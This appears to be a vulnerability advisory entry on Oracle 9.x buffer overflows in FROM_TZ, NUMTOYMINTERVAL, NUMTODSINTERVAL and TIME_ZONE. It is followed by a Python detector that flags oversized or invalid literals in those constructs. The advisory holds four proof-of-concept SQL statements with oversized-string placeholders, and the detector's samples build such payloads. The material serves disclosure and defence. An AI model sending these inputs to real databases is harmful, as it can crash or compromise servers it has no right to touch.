Oracle 9.x – ‘Database’ / Statement Buffer Overflow

Vulnerability ID: 1053717
Vulnerability type:
Published: 2003-02-05
Updated: 2003-02-05
CVE ID: N/A
CNNVD-ID: N/A
Platform: Multiple
CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/23656
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit
source: http://www.securityfocus.com/bid/9587/info

Oracle database has been reported prone to multiple buffer overflow vulnerabilities when processing certain parameters and functions, specifically the TIME_ZONE parameter and the NUMTOYMINTERVAL, NUMTODSINTERVAL and FROM_TZ functions. Excessive data passed to any of these parameters or functions may overrun the bounds of a buffer in stack-based memory. This may corrupt memory adjacent to the affected buffer and may ultimately allow arbitrary code execution.

SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00','long string here') FROM DUAL;

SELECT last_name, hire_date, salary, SUM(salary) OVER (ORDER BY hire_date RANGE NUMTOYMINTERVAL(1,'<long string here>') PRECEDING) AS t_sal FROM employees;

SELECT empno, ename, hiredate, COUNT(*) OVER (PARTITION BY empno ORDER BY hiredate RANGE NUMTODSINTERVAL(100, '<long string here>') PRECEDING) AS t_count FROM emp;

ALTER SESSION SET TIME_ZONE = '<long string here>'; SELECT CURRENT_TIMESTAMP, LOCALTIMESTAMP FROM DUAL;
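
As an added example (not part of the original advisory and not Oracle's code), a defender-side check over captured SQL text that flags the four constructs named above when their string literal is not a valid interval unit or exceeds an assumed 64-character ceiling for a time zone value. The function name, rule table, threshold and sample statements are assumptions constructed for illustration.

```python
import re

# Assumption: 64 chars is a generous ceiling for a time zone name or offset.
MAX_TZ_LEN = 64
LIT = r"'((?:[^']|'')*)'"  # Oracle string literal; '' is an escaped quote
ARG2 = r"\s*\([^;]*?,\s*" + LIT + r"\s*\)"  # literal as the last argument
FLAGS = re.I | re.S

# (construct, pattern, allowed values or None for a length check)
RULES = [
    ("FROM_TZ", re.compile(r"\bFROM_TZ" + ARG2, FLAGS), None),
    ("NUMTOYMINTERVAL", re.compile(r"\bNUMTOYMINTERVAL" + ARG2, FLAGS),
     {"YEAR", "MONTH"}),
    ("NUMTODSINTERVAL", re.compile(r"\bNUMTODSINTERVAL" + ARG2, FLAGS),
     {"DAY", "HOUR", "MINUTE", "SECOND"}),
    ("TIME_ZONE", re.compile(r"\bSET\s+TIME_ZONE\s*=\s*" + LIT, FLAGS), None),
]

def check_statement(sql):
    """Return [(construct, literal_length)] for suspicious literals in sql."""
    findings = []
    for name, rx, allowed in RULES:
        for m in rx.finditer(sql):
            arg = m.group(1)
            if allowed is not None:
                # Interval units are a closed, case-insensitive set.
                bad = arg.strip().upper() not in allowed
            else:
                # Time zone values are open-ended, so bound their length.
                bad = len(arg) > MAX_TZ_LEN
            if bad:
                findings.append((name, len(arg)))
    return findings

if __name__ == "__main__":
    filler = "A" * 300  # constructed stand-in for an oversized argument
    samples = [  # constructed audit-log statements
        "SELECT FROM_TZ(TIMESTAMP '2000-03-28 08:00:00','+08:00') FROM DUAL",
        "SELECT NUMTOYMINTERVAL(1,'year') FROM DUAL",
        "ALTER SESSION SET TIME_ZONE = '%s'" % filler,
        "SELECT NUMTODSINTERVAL(100, '%s') FROM DUAL" % filler,
    ]
    for s in samples:
        print(check_statement(s), s[:60])
```

The same allowlist-and-length logic can sit in front of the database (a proxy or application layer) so that these arguments are rejected before they reach an unpatched server.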
